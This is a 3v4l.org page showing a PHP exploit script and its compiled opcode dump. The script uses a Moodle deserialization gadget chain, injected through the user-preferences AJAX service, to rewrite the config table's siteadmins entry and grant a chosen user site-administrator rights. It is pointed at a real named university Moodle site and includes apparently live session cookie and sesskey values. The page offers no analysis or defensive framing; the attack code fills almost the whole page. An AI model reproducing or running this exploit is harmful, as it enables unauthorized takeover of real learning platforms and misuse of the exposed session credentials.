3v4l.org

run code in 300+ PHP versions simultaneously
<?php namespace gradereport_singleview\local\ui { class feedback{ } } namespace { class gradereport_overview_external{ } class grade_item{ } class grade_grade{ } // creating a simple httpPost method which requires php-curl function httpPost($url, $data, $MoodleSession, $json) { $curl = curl_init($url); $headers = array('Cookie: MoodleSession='.$MoodleSession); if($json){ array_push($headers, 'Content-Type: application/json'); }else{ $data = urldecode(http_build_query($data)); } curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy $response = curl_exec($curl); curl_close($curl); return $response; } // creating a simple httpGet method which requires php-curl function httpGet($url, $MoodleSession) { $curl = curl_init($url); $headers = array('Cookie: MoodleSession='.$MoodleSession); curl_setopt($curl, CURLOPT_HTTPHEADER, $headers); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080'); //un-comment if you wish to use a proxy $response = curl_exec($curl); curl_close($curl); return $response; } function update_table($url, $MoodleSession, $sesskey, $table, $rowId, $column, $value){ //first we create a gradereport_overview_external object because it is supported by the Moodle autoloader and it includes the grade_grade and grade_item classes that we are going to need $base = new gradereport_overview_external(); // now we create the feedback object which inherits the vulnerable __tostring() method from its parent $fb = new gradereport_singleview\local\ui\feedback(); //filling the feedback object with the required properties for the exploit to work $fb -> grade = new grade_grade(); $fb -> grade -> grade_item = new grade_item(); $fb -> grade -> grade_item -> calculation = "[[somestring"; $fb -> grade -> grade_item -> calculation_normalized = false; //setting the table which we want to alter $fb -> grade -> grade_item -> table = $table; //setting the row id of the row that we want to alter $fb -> grade -> grade_item -> id = $rowId; //setting the column with the value that we want to insert $fb -> grade -> grade_item -> $column = $value; $fb -> grade -> grade_item -> required_fields = array($column,'id'); //creating the array with our base object (which itself is included in an array because the base object has no __tostring() method) and our payload object $arr = array(array($base),$fb); //serializing the array $value = serialize($arr); //we'll set the course_blocks sortorder to 0 so we default to legacy user preference $data = array('sesskey' => $sesskey, 'sortorder[]' => 0); httpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0); //injecting the payload $data = json_encode(array(array('index'=> 0, 'methodname'=>'core_user_update_user_preferences','args'=>array('preferences'=>array(array('type'=> 'course_overview_course_order', 'value' => $value)))))); httpPost($url.'/lib/ajax/service.php?sesskey='.$sesskey, $data, $MoodleSession,1); //getting the frontpage so the payload will activate httpGet($url.'http://moodle.najah.edu/user/preferences.php?userid=92558', $MoodleSession); } $url = 'http://moodle.najah.edu/'; //url of the Moodle site $MoodleSession = '5e69ipruqbisg7vprlcmag8606'; //your MoodleSession cookie value $sesskey = 'dR6co7FJPz'; //your sesskey $table = "config"; //table to update $rowId = 25; // row id to insert into. 25 is the row that sets the 'siteadmins' parameter. could vary from installation to installation $column = '92558'; //column name to update, which holds the userid $value = 3; // userid to set as 'siteadmins' Probably want to make it your own update_table($url, $MoodleSession,$sesskey,$table,$rowId,$column, $value); //reset the allversionshash config entry with a sha1 hash so the site reloads its configuration $rowId = 375; // row id of 'allversionshash' parameter //update_table($url, $MoodleSession,$sesskey,$table,$rowId, $column, sha1(time())); //reset the sortorder so we can see the front page again without the payload triggering $data = array('sesskey' => $sesskey, 'sortorder[]' => 1); httpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0); //force plugincheck so we can access admin panel httpGet($url.'/admin/index.php?cache=0&confirmplugincheck=1',$MoodleSession); } ?>
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/VcEEh
function name:  (null)
number of ops:  33
compiled vars:  !0 = $url, !1 = $MoodleSession, !2 = $sesskey, !3 = $table, !4 = $rowId, !5 = $column, !6 = $value, !7 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   90     0  E >   ASSIGN                                                   !0, 'http%3A%2F%2Fmoodle.najah.edu%2F'
   91     1        ASSIGN                                                   !1, '5e69ipruqbisg7vprlcmag8606'
   92     2        ASSIGN                                                   !2, 'dR6co7FJPz'
   94     3        ASSIGN                                                   !3, 'config'
   95     4        ASSIGN                                                   !4, 25
   96     5        ASSIGN                                                   !5, '92558'
   97     6        ASSIGN                                                   !6, 3
   99     7        INIT_FCALL                                               'update_table'
          8        SEND_VAR                                                 !0
          9        SEND_VAR                                                 !1
         10        SEND_VAR                                                 !2
         11        SEND_VAR                                                 !3
         12        SEND_VAR                                                 !4
         13        SEND_VAR                                                 !5
         14        SEND_VAR                                                 !6
         15        DO_FCALL                                      0          
  102    16        ASSIGN                                                   !4, 375
  106    17        INIT_ARRAY                                       ~17     !2, 'sesskey'
         18        ADD_ARRAY_ELEMENT                                ~17     1, 'sortorder%5B%5D'
         19        ASSIGN                                                   !7, ~17
  107    20        INIT_FCALL                                               'httppost'
         21        CONCAT                                           ~19     !0, '%2Fblocks%2Fcourse_overview%2Fsave.php'
         22        SEND_VAL                                                 ~19
         23        SEND_VAR                                                 !7
         24        SEND_VAR                                                 !1
         25        SEND_VAL                                                 0
         26        DO_FCALL                                      0          
  110    27        INIT_FCALL                                               'httpget'
         28        CONCAT                                           ~21     !0, '%2Fadmin%2Findex.php%3Fcache%3D0%26confirmplugincheck%3D1'
         29        SEND_VAL                                                 ~21
         30        SEND_VAR                                                 !1
         31        DO_FCALL                                      0          
  113    32      > RETURN                                                   1

Function httppost:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 12, Position 2 = 17
Branch analysis from position: 12
1 jumps found. (Code = 42) Position 1 = 24
Branch analysis from position: 24
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 17
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/VcEEh
function name:  httpPost
number of ops:  63
compiled vars:  !0 = $url, !1 = $data, !2 = $MoodleSession, !3 = $json, !4 = $curl, !5 = $headers, !6 = $response
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   19     0  E >   RECV                                             !0      
          1        RECV                                             !1      
          2        RECV                                             !2      
          3        RECV                                             !3      
   21     4        INIT_FCALL_BY_NAME                                       'curl_init'
          5        SEND_VAR_EX                                              !0
          6        DO_FCALL                                      0  $7      
          7        ASSIGN                                                   !4, $7
   22     8        CONCAT                                           ~9      'Cookie%3A+MoodleSession%3D', !2
          9        INIT_ARRAY                                       ~10     ~9
         10        ASSIGN                                                   !5, ~10
   23    11      > JMPZ                                                     !3, ->17
   24    12    >   INIT_FCALL                                               'array_push'
         13        SEND_REF                                                 !5
         14        SEND_VAL                                                 'Content-Type%3A+application%2Fjson'
         15        DO_ICALL                                                 
         16      > JMP                                                      ->24
   26    17    >   INIT_FCALL                                               'urldecode'
         18        INIT_FCALL                                               'http_build_query'
         19        SEND_VAR                                                 !1
         20        DO_ICALL                                         $13     
         21        SEND_VAR                                                 $13
         22        DO_ICALL                                         $14     
         23        ASSIGN                                                   !1, $14
   28    24    >   INIT_FCALL_BY_NAME                                       'curl_setopt'
         25        SEND_VAR_EX                                              !4
         26        FETCH_CONSTANT                                   ~16     'CURLOPT_POST'
         27        SEND_VAL_EX                                              ~16
         28        SEND_VAL_EX                                              <true>
         29        DO_FCALL                                      0          
   29    30        INIT_FCALL_BY_NAME                                       'curl_setopt'
         31        SEND_VAR_EX                                              !4
         32        FETCH_CONSTANT                                   ~18     'CURLOPT_HTTPHEADER'
         33        SEND_VAL_EX                                              ~18
         34        SEND_VAR_EX                                              !5
         35        DO_FCALL                                      0          
   30    36        INIT_FCALL_BY_NAME                                       'curl_setopt'
         37        SEND_VAR_EX                                              !4
         38        FETCH_CONSTANT                                   ~20     'CURLOPT_POSTFIELDS'
         39        SEND_VAL_EX                                              ~20
         40        SEND_VAR_EX                                              !1
         41        DO_FCALL                                      0          
   31    42        INIT_FCALL_BY_NAME                                       'curl_setopt'
         43        SEND_VAR_EX                                              !4
         44        FETCH_CONSTANT                                   ~22     'CURLOPT_RETURNTRANSFER'
         45        SEND_VAL_EX                                              ~22
         46        SEND_VAL_EX                                              <true>
         47        DO_FCALL                                      0          
   32    48        INIT_FCALL_BY_NAME                                       'curl_setopt'
         49        SEND_VAR_EX                                              !4
         50        FETCH_CONSTANT                                   ~24     'CURLOPT_PROXY'
         51        SEND_VAL_EX                                              ~24
         52        SEND_VAL_EX                                              '127.0.0.1%3A8080'
         53        DO_FCALL                                      0          
   33    54        INIT_FCALL_BY_NAME                                       'curl_exec'
         55        SEND_VAR_EX                                              !4
         56        DO_FCALL                                      0  $26     
         57        ASSIGN                                                   !6, $26
   34    58        INIT_FCALL_BY_NAME                                       'curl_close'
         59        SEND_VAR_EX                                              !4
         60        DO_FCALL                                      0          
   35    61      > RETURN                                                   !6
   36    62*     > RETURN                                                   null

End of function httppost

Function httpget:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/VcEEh
function name:  httpGet
number of ops:  36
compiled vars:  !0 = $url, !1 = $MoodleSession, !2 = $curl, !3 = $headers, !4 = $response
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   39     0  E >   RECV                                             !0      
          1        RECV                                             !1      
   41     2        INIT_FCALL_BY_NAME                                       'curl_init'
          3        SEND_VAR_EX                                              !0
          4        DO_FCALL                                      0  $5      
          5        ASSIGN                                                   !2, $5
   42     6        CONCAT                                           ~7      'Cookie%3A+MoodleSession%3D', !1
          7        INIT_ARRAY                                       ~8      ~7
          8        ASSIGN                                                   !3, ~8
   43     9        INIT_FCALL_BY_NAME                                       'curl_setopt'
         10        SEND_VAR_EX                                              !2
         11        FETCH_CONSTANT                                   ~10     'CURLOPT_HTTPHEADER'
         12        SEND_VAL_EX                                              ~10
         13        SEND_VAR_EX                                              !3
         14        DO_FCALL                                      0          
   44    15        INIT_FCALL_BY_NAME                                       'curl_setopt'
         16        SEND_VAR_EX                                              !2
         17        FETCH_CONSTANT                                   ~12     'CURLOPT_RETURNTRANSFER'
         18        SEND_VAL_EX                                              ~12
         19        SEND_VAL_EX                                              <true>
         20        DO_FCALL                                      0          
   45    21        INIT_FCALL_BY_NAME                                       'curl_setopt'
         22        SEND_VAR_EX                                              !2
         23        FETCH_CONSTANT                                   ~14     'CURLOPT_PROXY'
         24        SEND_VAL_EX                                              ~14
         25        SEND_VAL_EX                                              '127.0.0.1%3A8080'
         26        DO_FCALL                                      0          
   46    27        INIT_FCALL_BY_NAME                                       'curl_exec'
         28        SEND_VAR_EX                                              !2
         29        DO_FCALL                                      0  $16     
         30        ASSIGN                                                   !4, $16
   47    31        INIT_FCALL_BY_NAME                                       'curl_close'
         32        SEND_VAR_EX                                              !2
         33        DO_FCALL                                      0          
   48    34      > RETURN                                                   !4
   49    35*     > RETURN                                                   null

End of function httpget

Function update_table:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/VcEEh
function name:  update_table
number of ops:  92
compiled vars:  !0 = $url, !1 = $MoodleSession, !2 = $sesskey, !3 = $table, !4 = $rowId, !5 = $column, !6 = $value, !7 = $base, !8 = $fb, !9 = $arr, !10 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   51     0  E >   RECV                                             !0      
          1        RECV                                             !1      
          2        RECV                                             !2      
          3        RECV                                             !3      
          4        RECV                                             !4      
          5        RECV                                             !5      
          6        RECV                                             !6      
   53     7        NEW                                              $11     'gradereport_overview_external'
          8        DO_FCALL                                      0          
          9        ASSIGN                                                   !7, $11
   56    10        NEW                                              $14     'gradereport_singleview%5Clocal%5Cui%5Cfeedback'
         11        DO_FCALL                                      0          
         12        ASSIGN                                                   !8, $14
   59    13        NEW                                              $18     'grade_grade'
         14        DO_FCALL                                      0          
         15        ASSIGN_OBJ                                               !8, 'grade'
         16        OP_DATA                                                  $18
   60    17        NEW                                              $22     'grade_item'
         18        DO_FCALL                                      0          
         19        FETCH_OBJ_W                                      $20     !8, 'grade'
         20        ASSIGN_OBJ                                               $20, 'grade_item'
         21        OP_DATA                                                  $22
   61    22        FETCH_OBJ_W                                      $24     !8, 'grade'
         23        FETCH_OBJ_W                                      $25     $24, 'grade_item'
         24        ASSIGN_OBJ                                               $25, 'calculation'
         25        OP_DATA                                                  '%5B%5Bsomestring'
   62    26        FETCH_OBJ_W                                      $27     !8, 'grade'
         27        FETCH_OBJ_W                                      $28     $27, 'grade_item'
         28        ASSIGN_OBJ                                               $28, 'calculation_normalized'
         29        OP_DATA                                                  <false>
   65    30        FETCH_OBJ_W                                      $30     !8, 'grade'
         31        FETCH_OBJ_W                                      $31     $30, 'grade_item'
         32        ASSIGN_OBJ                                               $31, 'table'
         33        OP_DATA                                                  !3
   67    34        FETCH_OBJ_W                                      $33     !8, 'grade'
         35        FETCH_OBJ_W                                      $34     $33, 'grade_item'
         36        ASSIGN_OBJ                                               $34, 'id'
         37        OP_DATA                                                  !4
   69    38        FETCH_OBJ_W                                      $36     !8, 'grade'
         39        FETCH_OBJ_W                                      $37     $36, 'grade_item'
         40        ASSIGN_OBJ                                               $37, !5
         41        OP_DATA                                                  !6
   70    42        INIT_ARRAY                                       ~42     !5
         43        ADD_ARRAY_ELEMENT                                ~42     'id'
         44        FETCH_OBJ_W                                      $39     !8, 'grade'
         45        FETCH_OBJ_W                                      $40     $39, 'grade_item'
         46        ASSIGN_OBJ                                               $40, 'required_fields'
         47        OP_DATA                                                  ~42
   73    48        INIT_ARRAY                                       ~43     !7
         49        INIT_ARRAY                                       ~44     ~43
         50        ADD_ARRAY_ELEMENT                                ~44     !8
         51        ASSIGN                                                   !9, ~44
   76    52        INIT_FCALL                                               'serialize'
         53        SEND_VAR                                                 !9
         54        DO_ICALL                                         $46     
         55        ASSIGN                                                   !6, $46
   79    56        INIT_ARRAY                                       ~48     !2, 'sesskey'
         57        ADD_ARRAY_ELEMENT                                ~48     0, 'sortorder%5B%5D'
         58        ASSIGN                                                   !10, ~48
   80    59        INIT_FCALL                                               'httppost'
         60        CONCAT                                           ~50     !0, '%2Fblocks%2Fcourse_overview%2Fsave.php'
         61        SEND_VAL                                                 ~50
         62        SEND_VAR                                                 !10
         63        SEND_VAR                                                 !1
         64        SEND_VAL                                                 0
         65        DO_FCALL                                      0          
   83    66        INIT_FCALL                                               'json_encode'
         67        INIT_ARRAY                                       ~52     0, 'index'
         68        ADD_ARRAY_ELEMENT                                ~52     'core_user_update_user_preferences', 'methodname'
         69        INIT_ARRAY                                       ~53     'course_overview_course_order', 'type'
         70        ADD_ARRAY_ELEMENT                                ~53     !6, 'value'
         71        INIT_ARRAY                                       ~54     ~53
         72        INIT_ARRAY                                       ~55     ~54, 'preferences'
         73        ADD_ARRAY_ELEMENT                                ~52     ~55, 'args'
         74        INIT_ARRAY                                       ~56     ~52
         75        SEND_VAL                                                 ~56
         76        DO_ICALL                                         $57     
         77        ASSIGN                                                   !10, $57
   84    78        INIT_FCALL                                               'httppost'
         79        CONCAT                                           ~59     !0, '%2Flib%2Fajax%2Fservice.php%3Fsesskey%3D'
         80        CONCAT                                           ~60     ~59, !2
         81        SEND_VAL                                                 ~60
         82        SEND_VAR                                                 !10
         83        SEND_VAR                                                 !1
         84        SEND_VAL                                                 1
         85        DO_FCALL                                      0          
   87    86        INIT_FCALL                                               'httpget'
         87        CONCAT                                           ~62     !0, 'http%3A%2F%2Fmoodle.najah.edu%2Fuser%2Fpreferences.php%3Fuserid%3D92558'
         88        SEND_VAL                                                 ~62
         89        SEND_VAR                                                 !1
         90        DO_FCALL                                      0          
   88    91      > RETURN                                                   null

End of function update_table

Class gradereport_singleview\local\ui\feedback: [no user functions]
Class gradereport_overview_external: [no user functions]
Class grade_item: [no user functions]
Class grade_grade: [no user functions]

Generated using Vulcan Logic Dumper, using php 8.0.0

preferences:
169.95 ms | 1419 KiB | 29 Q